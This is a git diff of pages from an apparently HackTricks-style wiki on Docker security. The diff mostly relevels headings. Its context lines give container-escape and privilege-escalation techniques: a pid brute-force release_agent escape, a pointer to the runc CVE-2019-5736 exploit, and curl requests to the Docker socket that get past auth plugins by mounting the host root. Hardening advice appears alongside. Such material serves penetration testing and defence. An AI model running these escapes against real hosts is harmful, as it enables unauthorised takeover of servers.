+## Kata Containers
```
root@container:~$ head -1 /etc/mtab
@@ -231,7 +229,7 @@ kataShared on / type 9p (rw,dirsync,nodev,relatime,mmap,access=client,trans=virt
\* More on Kata Containers in a future blog post.
-### Device Mapper
+## Device Mapper
```
root@container:~$ head -1 /etc/mtab
@@ -240,13 +238,13 @@ root@container:~$ head -1 /etc/mtab
I saw a container with this root mount in a live environment, I believe the container was running with a specific `devicemapper` storage-driver configuration, but at this point I have been unable to replicate this behaviour in a test environment.
-### An Alternative PoC
+## An Alternative PoC
Obviously in these cases there is not enough information to identify the path of container files on the host file system, so Felix’s PoC cannot be used as is. However, we can still execute this attack with a little ingenuity.
The one key piece of information required is the full path, relative to the container host, of a file to execute within the container. Without being able to discern this from mount points within the container we have to look elsewhere.
-#### Proc to the Rescue
+### Proc to the Rescue
The Linux `/proc` pseudo-filesystem exposes kernel process data structures for all processes running on a system, including those running in different namespaces, for example within a container. This can be shown by running a command in a container and accessing the `/proc` directory of the process on the host:Container
@@ -296,7 +294,7 @@ findme
This changes the requirement for the attack from knowing the full path, relative to the container host, of a file within the container, to knowing the pid of _any_ process running in the container.
-#### Pid Bashing
+### Pid Bashing
This is actually the easy part, process ids in Linux are numerical and assigned sequentially. The `init` process is assigned process id `1` and all subsequent processes are assigned incremental ids. To identify the host process id of a process within a container, a brute force incremental search can be used:Container
@@ -316,7 +314,7 @@ root@host:~$ cat /proc/${COUNTER}/root/findme
findme
```
-#### Putting it All Together
+### Putting it All Together
To complete this attack the brute force technique can be used to guess the pid for the path `/proc//root/payload.sh`, with each iteration writing the guessed pid path to the cgroups `release_agent` file, triggering the `release_agent`, and seeing if an output file is created.
@@ -414,7 +412,7 @@ root 10 2 0 11:25 ? 00:00:00 [ksoftirqd/0]
...
```
-## Runc exploit (CVE-2019-5736)
+# Runc exploit (CVE-2019-5736)
In case you can execute `docker exec` as root (probably with sudo), you try to escalate privileges escaping from a container abusing CVE-2019-5736 (exploit [here](https://github.com/Frichetten/CVE-2019-5736-PoC/blob/master/main.go)). This technique will basically **overwrite** the _**/bin/sh**_ binary of the **host** **from a container**, so anyone executing docker exec may trigger the payload.
@@ -427,11 +425,11 @@ This will trigger the payload which is present in the main.go file.
For more information: [https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html)
-## Docker Auth Plugin Bypass
+# Docker Auth Plugin Bypass
In some occasions, the sysadmin may install some plugins to docker to avoid low privilege users to interact with docker without being able to escalate privileges.
-### disallowed `run --privileged`
+## disallowed `run --privileged`
In this case the sysadmin **disallowed users to mount volumes and run containers with the `--privileged` flag** or give any extra capability to the container:
@@ -451,7 +449,7 @@ docker exec -it --privileged bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6f
Now, the user can escape from the container using any of the previously discussed techniques and escalate privileges inside the host.
-### Mount Writable Folder
+## Mount Writable Folder
In this case the sysadmin **disallowed users to run containers with the `--privileged` flag** or give any extra capability to the container, and he only allowed to mount the `/tmp` folder:
@@ -472,7 +470,7 @@ Note that maybe you cannot mount the folder `/tmp` but you can mount a **differe
Note also that if you can **mount `/etc`** or any other folder **containing configuration files**, you may change them from the docker container as root in order to **abuse them in the host** and escalate privileges (maybe modifying `/etc/shadow`)
{% endhint %}
-### Unchecked JSON Structure
+## Unchecked JSON Structure
It's possible that when the sysadmin configured the docker firewall he **forgot about some important parameter** of the API ([https://docs.docker.com/engine/api/v1.40/#operation/ContainerList](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList)) like "**Binds**".\
In the following example it's possible to abuse this misconfiguration to create and run a container that mounts the root (/) folder of the host:
@@ -487,7 +485,7 @@ docker exec -it f6932bc153ad chroot /host bash #Get a shell inside of it
#You can access the host filesystem
```
-### Unchecked JSON Attribute
+## Unchecked JSON Attribute
It's possible that when the sysadmin configured the docker firewall he **forgot about some important attribute of a parametter** of the API ([https://docs.docker.com/engine/api/v1.40/#operation/ContainerList](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList)) like "**Capabilities**" inside "**HostConfig**". In the following example it's possible to abuse this misconfiguration to create and run a container with the **SYS_MODULE** capability:
@@ -501,27 +499,27 @@ capsh --print
#You can abuse the SYS_MODULE capability
```
-## Writable hostPath Mount
+# Writable hostPath Mount
(Info from [**here**](https://medium.com/swlh/kubernetes-attack-path-part-2-post-initial-access-1e27aabda36d)) Within the container, an attacker may attempt to gain further access to the underlying host OS via a writable hostPath volume created by the cluster. Below is some common things you can check within the container to see if you leverage this attacker vector:
```bash
-#### Check if You Can Write to a File-system
+### Check if You Can Write to a File-system
$ echo 1 > /proc/sysrq-trigger
-#### Check root UUID
+### Check root UUID
$ cat /proc/cmdlineBOOT_IMAGE=/boot/vmlinuz-4.4.0-197-generic root=UUID=b2e62f4f-d338-470e-9ae7-4fc0e014858c ro console=tty1 console=ttyS0 earlyprintk=ttyS0 rootdelay=300- Check Underlying Host Filesystem
$ findfs UUID=/dev/sda1- Attempt to Mount the Host's Filesystem
$ mkdir /mnt-test
$ mount /dev/sda1 /mnt-testmount: /mnt: permission denied. ---> Failed! but if not, you may have access to the underlying host OS file-system now.
-#### debugfs (Interactive File System Debugger)
+### debugfs (Interactive File System Debugger)
$ debugfs /dev/sda1
```
-## Containers Security Improvements
+# Containers Security Improvements
-### Seccomp in Docker
+## Seccomp in Docker
This is not a technique to breakout from a Docker container but a security feature that Docker uses and you should know about as it might prevent you from breaking out from docker:
@@ -529,7 +527,7 @@ This is not a technique to breakout from a Docker container but a security featu
[seccomp.md](seccomp.md)
{% endcontent-ref %}
-### AppArmor in Docker
+## AppArmor in Docker
This is not a technique to breakout from a Docker container but a security feature that Docker uses and you should know about as it might prevent you from breaking out from docker:
@@ -537,7 +535,7 @@ This is not a technique to breakout from a Docker container but a security featu
[apparmor.md](apparmor.md)
{% endcontent-ref %}
-### AuthZ & AuthN
+## AuthZ & AuthN
An authorization plugin **approves** or **denies** **requests** to the Docker **daemon** based on both the current **authentication** context and the **command** **context**. The **authentication** **context** contains all **user details** and the **authentication** **method**. The **command context** contains all the **relevant** **request** data.
@@ -545,19 +543,19 @@ An authorization plugin **approves** or **denies** **requests** to the Docker **
[Broken link](broken-reference)
{% endcontent-ref %}
-### gVisor
+## gVisor
**gVisor** is an application kernel, written in Go, that implements a substantial portion of the Linux system surface. It includes an [Open Container Initiative (OCI)](https://www.opencontainers.org) runtime called `runsc` that provides an **isolation boundary between the application and the host kernel**. The `runsc` runtime integrates with Docker and Kubernetes, making it simple to run sandboxed containers.
{% embed url="https://github.com/google/gvisor" %}
-## Kata Containers
+# Kata Containers
**Kata Containers** is an open source community working to build a secure container runtime with lightweight virtual machines that feel and perform like containers, but provide** stronger workload isolation using hardware virtualization** technology as a second layer of defense.
{% embed url="https://katacontainers.io/" %}
-### Use containers securely
+## Use containers securely
Docker restricts and limits containers by default. Loosening these restrictions may create security issues, even without the full power of the `--privileged` flag. It is important to acknowledge the impact of each additional permission, and limit permissions overall to the minimum necessary.
@@ -572,7 +570,7 @@ To help keep containers secure:
* Use [official docker images](https://docs.docker.com/docker-hub/official_images/) or build your own based on them. Don’t inherit or use [backdoored](https://arstechnica.com/information-technology/2018/06/backdoored-images-downloaded-5-million-times-finally-removed-from-docker-hub/) images.
* Regularly rebuild your images to apply security patches. This goes without saying.
-## References
+# References
* [https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/)
* [https://twitter.com/\_fel1x/status/1151487051986087936](https://twitter.com/\_fel1x/status/1151487051986087936)
diff --git a/linux-unix/privilege-escalation/docker-breakout/README.md b/linux-unix/privilege-escalation/docker-breakout/README.md
index 5a6bb401..ff06ae7f 100644
--- a/linux-unix/privilege-escalation/docker-breakout/README.md
+++ b/linux-unix/privilege-escalation/docker-breakout/README.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Docker Basics & Breakout
-
-## **Basic Docker Engine Security**
+# **Basic Docker Engine Security**
Docker engine does the heavy lifting of running and managing Containers. Docker engine uses Linux kernel features like **Namespaces** and **Cgroups** to provide basic **isolation** across Containers. Advanced isolation can be achieved using Linux kernel features like **Capabilities**, **Seccomp**, **SELinux/AppArmor**. Docker exposes these Linux kernel capabilities either at Docker daemon level or at each Container level.
@@ -28,7 +26,7 @@ Finally, an **auth plugin** can be used to **limit the actions** users can perfo
 (1) (1).png>)
-### **Docker engine secure access**
+## **Docker engine secure access**
Docker client can access Docker engine **locally using Unix socket or remotely using http** mechanism. To use it remotely, it is needed to use https and **TLS** so that confidentiality, integrity and authentication can be ensured.
@@ -43,7 +41,7 @@ Sudo service docker restart -> Restart Docker daemon
Exposing Docker daemon using http is not a good practice and it is needed to secure the connection using https. There are two options: first option is for **client to verify server identity** and in second option **both client and server verify each other’s identity**. Certificates establish the identity of a server. For an example of both options [**check this page**](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-3engine-access/).
-### **Container image security**
+## **Container image security**
Container images are stored either in private repository or public repository. Following are the options that Docker provides for storing Container images:
@@ -51,13 +49,13 @@ Container images are stored either in private repository or public repository. F
* [Docker registry](https://github.com/%20docker/distribution) – This is an open source project that users can use to host their own registry.
* [Docker trusted registry](https://www.docker.com/docker-trusted-registry) – This is Docker’s commercial implementation of Docker registry and it provides role based user authentication along with LDAP directory service integration.
-### Image Scanning
+## Image Scanning
Containers can have **security vulnerabilities** either because of the base image or because of the software installed on top of the base image. Docker is working on a project called **Nautilus** that does security scan of Containers and lists the vulnerabilities. Nautilus works by comparing the each Container image layer with vulnerability repository to identify security holes.
For more [**information read this**](https://docs.docker.com/engine/scan/).
-#### How to scan images
+### How to scan images
The `docker scan` command allows you to scan existing Docker images using the image name or ID. For example, run the following command to scan the hello-world image:
@@ -77,7 +75,7 @@ Licenses: enabled
Note that we do not currently have vulnerability data for your image.
```
-### Docker Image Signing
+## Docker Image Signing
Docker Container images can be stored either in public or private registry. It is needed to **sign** **Container** images to be able to confirm images haven't being tampered. Content **publisher** takes care of **signing** Container image and pushing it into the registry.\
Following are some details on Docker content trust:
@@ -117,9 +115,9 @@ tar -zcvf private_keys_backup.tar.gz ~/.docker/trust/private
When I changed Docker host, I had to move the root keys and repository keys to operate from the new host.
-## Containers Security Improvements
+# Containers Security Improvements
-### Namespaces
+## Namespaces
**Namespaces** are a feature of the Linux kernel that **partitions kernel resources** such that one set of **processes** **sees** one set of **resources** while **another** set of **processes** sees a **different** set of resources. The feature works by having the same namespace for a set of resources and processes, but those namespaces refer to distinct resources. Resources may exist in multiple spaces.
@@ -137,7 +135,7 @@ For **more information about the namespaces** check the following page:
[namespaces.md](namespaces.md)
{% endcontent-ref %}
-### cgroups
+## cgroups
Linux kernel feature **cgroups** provides capability to **restrict resources like cpu, memory, io, network bandwidth among** a set of processes. Docker allows to create Containers using cgroup feature which allows for resource control for the specific Container.\
Following is a Container created with user space memory limited to 500m, kernel memory limited to 50m, cpu share to 512, blkioweight to 400. CPU share is a ratio that controls Container’s CPU usage. It has a default value of 1024 and range between 0 and 1024. If three Containers have the same CPU share of 1024, each Container can take upto 33% of CPU in case of CPU resource contention. blkio-weight is a ratio that controls Container’s IO. It has a default value of 500 and range between 10 and 1000.
@@ -154,7 +152,7 @@ ps -ef | grep 1234 #Get info about the sleep process
ls -l /proc//ns #Get the Group and the namespaces (some may be uniq to the hosts and some may be shred with it)
```
-### Capabilities
+## Capabilities
Capabilities allow **finer control for the capabilities that can be allowed** for root user. Docker uses the Linux kernel capability feature to **limit the operations that can be done inside a Container** irrespective of the type of user.
@@ -162,7 +160,7 @@ Capabilities allow **finer control for the capabilities that can be allowed** fo
[linux-capabilities.md](../linux-capabilities.md)
{% endcontent-ref %}
-### Seccomp in Docker
+## Seccomp in Docker
This is a security feature that allows Docker to **limit the syscalls** that can be used inside the container:
@@ -170,7 +168,7 @@ This is a security feature that allows Docker to **limit the syscalls** that can
[seccomp.md](seccomp.md)
{% endcontent-ref %}
-### AppArmor in Docker
+## AppArmor in Docker
**AppArmor** is a kernel enhancement to confine **containers** to a **limited** set of **resources** with **per-program profiles**.:
@@ -178,7 +176,7 @@ This is a security feature that allows Docker to **limit the syscalls** that can
[apparmor.md](apparmor.md)
{% endcontent-ref %}
-### SELinux in Docker
+## SELinux in Docker
[SELinux](https://www.redhat.com/en/blog/latest-container-exploit-runc-can-be-blocked-selinux) is a **labeling** **system**. Every **process** and every **file** system object has a **label**. SELinux policies define rules about what a **process label is allowed to do with all of the other labels** on the system.
@@ -188,7 +186,7 @@ Container engines launch **container processes with a single confined SELinux la
[selinux.md](../selinux.md)
{% endcontent-ref %}
-### AuthZ & AuthN
+## AuthZ & AuthN
An authorization plugin **approves** or **denies** **requests** to the Docker **daemon** based on both the current **authentication** context and the **command** **context**. The **authentication** **context** contains all **user details** and the **authentication** **method**. The **command context** contains all the **relevant** **request** data.
@@ -196,9 +194,9 @@ An authorization plugin **approves** or **denies** **requests** to the Docker **
[authz-and-authn-docker-access-authorization-plugin.md](authz-and-authn-docker-access-authorization-plugin.md)
{% endcontent-ref %}
-## Interesting Docker Flags
+# Interesting Docker Flags
-### --privileged flag
+## --privileged flag
In the following page you can learn **what does the `--privileged` flag imply**:
@@ -206,9 +204,9 @@ In the following page you can learn **what does the `--privileged` flag imply**:
[docker-privileged.md](docker-privileged.md)
{% endcontent-ref %}
-### --security-opt
+## --security-opt
-#### no-new-privileges
+### no-new-privileges
If you are running a container where an attacker manages to get access as a low privilege user. If you have a **miss-configured suid binary**, the attacker may abuse it and **escalate privileges inside** the container. Which, may allow him to escape from it.
@@ -218,7 +216,7 @@ Running the container with the **`no-new-privileges`** option enabled will **pre
docker run -it --security-opt=no-new-privileges:true nonewpriv
```
-#### Other
+### Other
```bash
#You can manually add/drop capabilities with
@@ -237,9 +235,9 @@ docker run -it --security-opt=no-new-privileges:true nonewpriv
For more **`--security-opt`** options check: [https://docs.docker.com/engine/reference/run/#security-configuration](https://docs.docker.com/engine/reference/run/#security-configuration)
-## Other Security Considerations
+# Other Security Considerations
-### Managing Secrets
+## Managing Secrets
First of all, **do not put them inside your image!**
@@ -292,19 +290,19 @@ Then start Compose as usual with `docker-compose up --build my_service`.
If you’re using [Kubernetes](https://kubernetes.io/docs/concepts/configuration/secret/), it has support for secrets. [Helm-Secrets](https://github.com/futuresimple/helm-secrets) can help make secrets management in K8s easier. Additionally, K8s has Role Based Access Controls (RBAC) — as does Docker Enterprise. RBAC makes access Secrets management more manageable and more secure for teams.
-### gVisor
+## gVisor
**gVisor** is an application kernel, written in Go, that implements a substantial portion of the Linux system surface. It includes an [Open Container Initiative (OCI)](https://www.opencontainers.org) runtime called `runsc` that provides an **isolation boundary between the application and the host kernel**. The `runsc` runtime integrates with Docker and Kubernetes, making it simple to run sandboxed containers.
{% embed url="https://github.com/google/gvisor" %}
-### Kata Containers
+## Kata Containers
**Kata Containers** is an open source community working to build a secure container runtime with lightweight virtual machines that feel and perform like containers, but provide **stronger workload isolation using hardware virtualization** technology as a second layer of defense.
{% embed url="https://katacontainers.io/" %}
-### Summary Tips
+## Summary Tips
* **Do not use the `--privileged` flag or mount a** [**Docker socket inside the container**](https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/)**.** The docker socket allows for spawning containers, so it is an easy way to take full control of the host, for example, by running another container with the `--privileged` flag.
* Do **not run as root inside the container. Use a** [**different user**](https://docs.docker.com/develop/develop-images/dockerfile\_best-practices/#user) **and** [**user namespaces**](https://docs.docker.com/engine/security/userns-remap/)**.** The root in the container is the same as on host unless remapped with user namespaces. It is only lightly restricted by, primarily, Linux namespaces, capabilities, and cgroups.
@@ -321,7 +319,7 @@ If you’re using [Kubernetes](https://kubernetes.io/docs/concepts/configuration
* **Don’t put ssh** inside container, “docker exec” can be used to ssh to Container.
* Have **smaller** container **images**
-## Docker Breakout / Privilege Escalation
+# Docker Breakout / Privilege Escalation
If you are **inside a docker container** or you have access to a user in the **docker group**, you could try to **escape and escalate privileges**:
@@ -329,7 +327,7 @@ If you are **inside a docker container** or you have access to a user in the **d
[docker-breakout-privilege-escalation.md](docker-breakout-privilege-escalation.md)
{% endcontent-ref %}
-## Docker Authentication Plugin Bypass
+# Docker Authentication Plugin Bypass
If you have access to the docker socket or have access to a user in the **docker group but your actions are being limited by a docker auth plugin**, check if you can **bypass it:**
@@ -337,12 +335,12 @@ If you have access to the docker socket or have access to a user in the **docker
[authz-and-authn-docker-access-authorization-plugin.md](authz-and-authn-docker-access-authorization-plugin.md)
{% endcontent-ref %}
-## Hardening Docker
+# Hardening Docker
* The tool [**docker-bench-security**](https://github.com/docker/docker-bench-security) is a script that checks for dozens of common best-practices around deploying Docker containers in production. The tests are all automated, and are based on the [CIS Docker Benchmark v1.3.1](https://www.cisecurity.org/benchmark/docker/).\
You need to run the tool from the host running docker or from a container with enough privileges. Find out **how to run it in the README:** [**https://github.com/docker/docker-bench-security**](https://github.com/docker/docker-bench-security).
-## References
+# References
* [https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/)
* [https://twitter.com/\_fel1x/status/1151487051986087936](https://twitter.com/\_fel1x/status/1151487051986087936)
diff --git a/linux-unix/privilege-escalation/docker-breakout/abusing-docker-socket-for-privilege-escalation.md b/linux-unix/privilege-escalation/docker-breakout/abusing-docker-socket-for-privilege-escalation.md
index 71e0123a..587790fd 100644
--- a/linux-unix/privilege-escalation/docker-breakout/abusing-docker-socket-for-privilege-escalation.md
+++ b/linux-unix/privilege-escalation/docker-breakout/abusing-docker-socket-for-privilege-escalation.md
@@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Abusing Docker Socket for Privilege Escalation
-
There are some occasions were you just have **access to the docker socket** and you want to use it to **escalate privileges**. Some actions might be very suspicious and you may want to avoid them, so here you can find different flags that can be useful to escalate privileges:
-### Via mount
+## Via mount
You can **mount** different parts of the **filesystem** in a container running as root and **access** them.\
You could also **abuse a mount to escalate privileges** inside the container.
@@ -49,12 +47,12 @@ Note that maybe you cannot mount the folder `/tmp` but you can mount a **differe
Note also that if you can **mount `/etc`** or any other folder **containing configuration files**, you may change them from the docker container as root in order to **abuse them in the host** and escalate privileges (maybe modifying `/etc/shadow`)
{% endhint %}
-### Escaping from the container
+## Escaping from the container
* **`--privileged`** -> With this flag you [remove all the isolation from the container](docker-privileged.md#what-affects). Check techniques to [escape from privileged containers as root](docker-breakout-privilege-escalation.md#automatic-enumeration-and-escape).
* **`--cap-add= [--security-opt apparmor=unconfined] [--security-opt seccomp=unconfined] [-security-opt label:disable]`** -> To [escalate abusing capabilities](../linux-capabilities.md), **grant that capability to the container** and disable other protection methods that may prevent the exploit to work.
-### Curl
+## Curl
In this page we have discussed ways to escalate privileges using docker flags, you can find **ways to abuse these methods using curl** command in the page:
diff --git a/linux-unix/privilege-escalation/docker-breakout/apparmor.md b/linux-unix/privilege-escalation/docker-breakout/apparmor.md
index e91df55f..8e73b665 100644
--- a/linux-unix/privilege-escalation/docker-breakout/apparmor.md
+++ b/linux-unix/privilege-escalation/docker-breakout/apparmor.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# AppArmor
-
-## Basic Information
+# Basic Information
**AppArmor** is a kernel enhancement to confine **programs** to a **limited** set of **resources** with **per-program profiles**. Profiles can **allow** **capabilities** like network access, raw socket access, and the permission to read, write, or execute files on matching paths.
@@ -32,21 +30,21 @@ AppArmor profiles can be in one of **two modes**:
AppArmor differs from some other MAC systems on Linux: it is **path-based**, it allows mixing of enforcement and complain mode profiles, it uses include files to ease development, and it has a far lower barrier to entry than other popular MAC systems.
-### Parts of AppArmor
+## Parts of AppArmor
* **Kernel module**: Does the actual work
* **Policies**: Defines the behaviour and containment
* **Parser**: Loads the policies into kernel
* **Utilities**: Usermode programs to interact with apparmor
-### Profiles path
+## Profiles path
Apparmor profiles are usually saved in _**/etc/apparmor.d/**_\
With `sudo aa-status` you will be able to list the binaries that are restricted by some profile. If you can change the char "/" for a dot of the path of each listed binary and you will obtain the name of the apparmor profile inside the mentioned folder.
For example, a **apparmor** profile for _/usr/bin/man_ will be located in _/etc/apparmor.d/usr.bin.man_
-### Commands
+## Commands
```bash
aa-status #check the current status
@@ -58,7 +56,7 @@ aa-logprof #used to change the policy when the binary/program is changed
aa-mergeprof #used to merge the policies
```
-## Creating a profile
+# Creating a profile
* In order to indicate the affected executable, **absolute paths and wildcards** are allowed (for file globbing) for specifying files.
* To indicate the access the binary will have over **files** the following **access controls** can be used:
@@ -74,7 +72,7 @@ aa-mergeprof #used to merge the policies
* **Variables** can be defined in the profiles and can be manipulated from outside the profile. For example: @{PROC} and @{HOME} (add #include \ to the profile file)
* **Deny rules are supported to override allow rules**.
-### aa-genprof
+## aa-genprof
To easily start creating a profile apparmor can help you. It's possible to make **apparmor inspect the actions performed by a binary and then let you decide which actions you want to allow or deny**.\
You just need to run:
@@ -95,7 +93,7 @@ Then, in the first console press "**s**" and then in the recorded actions indica
Using the arrow keys you can select what you want to allow/deny/whatever
{% endhint %}
-### aa-easyprof
+## aa-easyprof
You can also create a template of an apparmor profile of a binary with:
@@ -134,7 +132,7 @@ You can then **enforce** the new profile with
sudo apparmor_parser -a /etc/apparmor.d/path.to.binary
```
-### Modifying a profile from logs
+## Modifying a profile from logs
The following tool will read the logs and ask the user if he wants to permit some of the detected forbidden actions:
@@ -146,7 +144,7 @@ sudo aa-logprof
Using the arrow keys you can select what you want to allow/deny/whatever
{% endhint %}
-### Managing a Profile
+## Managing a Profile
```bash
#Main profile management commands
@@ -156,7 +154,7 @@ apparmor_parser -r /etc/apparmor.d/profile.name #Replace existing profile
apparmor_parser -R /etc/apparmor.d/profile.name #Remove profile
```
-## Logs
+# Logs
Example of **AUDIT** and **DENIED** logs from _/var/log/audit/audit.log_ of the executable **`service_bin`**:
@@ -185,7 +183,7 @@ AppArmor denials: 2 (since Wed Jan 6 23:51:08 2021)
For more information, please see: https://wiki.ubuntu.com/DebuggingApparmor
```
-## Apparmor in Docker
+# Apparmor in Docker
Note how the profile **docker-profile** of docker is loaded by default:
@@ -249,7 +247,7 @@ Note that you can **add/remove** **capabilities** to the docker container (this
Usually, when you **find** that you have a **privileged capability** available **inside** a **docker** container **but** some part of the **exploit isn't working**, this will be because docker **apparmor will be preventing it**.
{% endhint %}
-### Example
+## Example
(Example from [**here**](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/))
@@ -279,7 +277,7 @@ $ docker run --rm -it --security-opt apparmor:mydocker -v ~/haproxy:/localhost b
chmod: /etc/hostname: Permission denied
```
-### AppArmor Docker Bypass1
+## AppArmor Docker Bypass1
You can find which **apparmor profile is running a container** using:
@@ -297,11 +295,11 @@ find /etc/apparmor.d/ -name "*lowpriv*" -maxdepth 1 2>/dev/null
In the weird case you can **modify the apparmor docker profile and reload it.** You could remove the restrictions and "bypass" them.
-### AppArmor Docker Bypass2
+## AppArmor Docker Bypass2
**AppArmor is path based**, this means that even if it might be **protecting** files inside a directory like **`/proc`** if you can **configure how the container is going to be run**, you could **mount** the proc directory of the host inside **`/host/proc`** and it **won't be protected by AppArmor anymore**.
-### AppArmor Shebang Bypass
+## AppArmor Shebang Bypass
In [**this bug**](https://bugs.launchpad.net/apparmor/+bug/1911431) you can see an example of how **even if you are preventing perl to be run with certain resources**, if you just create a a shell script **specifying** in the first line **`#!/usr/bin/perl`** and you **execute the file directly**, you will be able to execute whatever you want. E.g.:
diff --git a/linux-unix/privilege-escalation/docker-breakout/authz-and-authn-docker-access-authorization-plugin.md b/linux-unix/privilege-escalation/docker-breakout/authz-and-authn-docker-access-authorization-plugin.md
index 6ac40b7b..b6ee9454 100644
--- a/linux-unix/privilege-escalation/docker-breakout/authz-and-authn-docker-access-authorization-plugin.md
+++ b/linux-unix/privilege-escalation/docker-breakout/authz-and-authn-docker-access-authorization-plugin.md
@@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# AuthZ& AuthN - Docker Access Authorization Plugin
-
**Docker’s** out-of-the-box **authorization** model is **all or nothing**. Any user with permission to access the Docker daemon can **run any** Docker client **command**. The same is true for callers using Docker’s Engine API to contact the daemon. If you require **greater access control**, you can create **authorization plugins** and add them to your Docker daemon configuration. Using an authorization plugin, a Docker administrator can **configure granular access** policies for managing access to the Docker daemon.
-## Basic architecture
+# Basic architecture
Docker Auth plugins are **external** **plugins** you can use to **allow/deny** **actions** requested to the Docker Daemon **depending** on the **user** that requested it and the **action** **requested**.
@@ -39,13 +37,13 @@ For commands that can potentially hijack the HTTP connection (`HTTP Upgrade`), s
During request/response processing, some authorization flows might need to do additional queries to the Docker daemon. To complete such flows, plugins can call the daemon API similar to a regular user. To enable these additional queries, the plugin must provide the means for an administrator to configure proper authentication and security policies.
-### Several Plugins
+## Several Plugins
You are responsible for **registering** your **plugin** as part of the Docker daemon **startup**. You can install **multiple plugins and chain them together**. This chain can be ordered. Each request to the daemon passes in order through the chain. Only when **all the plugins grant access** to the resource, is the access granted.
-## Plugin Examples
+# Plugin Examples
-### Twistlock AuthZ Broker
+## Twistlock AuthZ Broker
The plugin [**authz**](https://github.com/twistlock/authz) allows you to create a simple **JSON** file that the **plugin** will be **reading** to authorize the requests. Therefore, it gives you the opportunity to control very easily which API endpoints can reach each user.
@@ -53,29 +51,29 @@ This is an example that will allow Alice and Bob can create new containers: `{"n
In the page [route\_parser.go](https://github.com/twistlock/authz/blob/master/core/route\_parser.go) you can find the relation between the requested URL and the action. In the page [types.go](https://github.com/twistlock/authz/blob/master/core/types.go) you can find the relation between the action name and the action
-### Simple Plugin Tutorial
+## Simple Plugin Tutorial
You can find an **easy to understand plugin** with detailed information about installation and debugging here: [**https://github.com/carlospolop-forks/authobot**](https://github.com/carlospolop-forks/authobot)
Read the `README` and the `plugin.go` code to understand how is it working.
-## Docker Auth Plugin Bypass
+# Docker Auth Plugin Bypass
-### Enumerate access
+## Enumerate access
The main things to check are the **which endpoints are allowed** and **which values of HostConfig are allowed**.
To perform this enumeration you can **use the tool** [**https://github.com/carlospolop/docker\_auth\_profiler**](https://github.com/carlospolop/docker\_auth\_profiler)**.**
-### disallowed `run --privileged`
+## disallowed `run --privileged`
-#### Minimum Privileges
+### Minimum Privileges
```bash
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash
```
-#### Running a container and then getting a privileged session
+### Running a container and then getting a privileged session
In this case the sysadmin **disallowed users to mount volumes and run containers with the `--privileged` flag** or give any extra capability to the container:
@@ -101,7 +99,7 @@ docker exec -it ---cap-add=SYS_ADMIN bb72293810b0f4ea65ee8fd200db418a48593c1a8a3
Now, the user can escape from the container using any of the [**previously discussed techniques**](./#privileged-flag) and **escalate privileges** inside the host.
-### Mount Writable Folder
+## Mount Writable Folder
In this case the sysadmin **disallowed users to run containers with the `--privileged` flag** or give any extra capability to the container, and he only allowed to mount the `/tmp` folder:
@@ -122,15 +120,15 @@ Note that maybe you cannot mount the folder `/tmp` but you can mount a **differe
Note also that if you can **mount `/etc`** or any other folder **containing configuration files**, you may change them from the docker container as root in order to **abuse them in the host** and escalate privileges (maybe modifying `/etc/shadow`)
{% endhint %}
-### Unchecked API Endpoint
+## Unchecked API Endpoint
The of the sysadmin configuring this plugin would be to control which actions and with which privileges each user can perform. Therefore, if the admin takes a **blacklist** approach with the endpoints and the attributes he might **forget some of them** that could allow an attacker to **escalate privileges.**
You can check the docker API in [https://docs.docker.com/engine/api/v1.40/#](https://docs.docker.com/engine/api/v1.40/#)
-### Unchecked JSON Structure
+## Unchecked JSON Structure
-#### Binds in root
+### Binds in root
It's possible that when the sysadmin configured the docker firewall he **forgot about some important parameter** of the [**API**](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList) like "**Binds**".\
In the following example it's possible to abuse this misconfiguration to create and run a container that mounts the root (/) folder of the host:
@@ -149,7 +147,7 @@ docker exec -it f6932bc153ad chroot /host bash #Get a shell inside of it
Note how in this example we are using the **`Binds`** param as a root level key in the JSON but in the API it appears under the key **`HostConfig`**
{% endhint %}
-#### Binds in HostConfig
+### Binds in HostConfig
Follow the same instruction as with **Binds in root** performing this **request** to the Docker API:
@@ -157,7 +155,7 @@ Follow the same instruction as with **Binds in root** performing this **request*
curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu", "HostConfig":{"Binds":["/:/host"]}}' http:/v1.40/containers/create
```
-#### Mounts in root
+### Mounts in root
Follow the same instruction as with **Binds in root** performing this **request** to the Docker API:
@@ -165,7 +163,7 @@ Follow the same instruction as with **Binds in root** performing this **request*
curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu-sleep", "Mounts": [{"Name": "fac36212380535", "Source": "/", "Destination": "/host", "Driver": "local", "Mode": "rw,Z", "RW": true, "Propagation": "", "Type": "bind", "Target": "/host"}]}' http:/v1.40/containers/create
```
-#### Mounts in HostConfig
+### Mounts in HostConfig
Follow the same instruction as with **Binds in root** performing this **request** to the Docker API:
@@ -173,7 +171,7 @@ Follow the same instruction as with **Binds in root** performing this **request*
curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu-sleep", "HostConfig":{"Mounts": [{"Name": "fac36212380535", "Source": "/", "Destination": "/host", "Driver": "local", "Mode": "rw,Z", "RW": true, "Propagation": "", "Type": "bind", "Target": "/host"}]}}' http:/v1.40/containers/cre
```
-### Unchecked JSON Attribute
+## Unchecked JSON Attribute
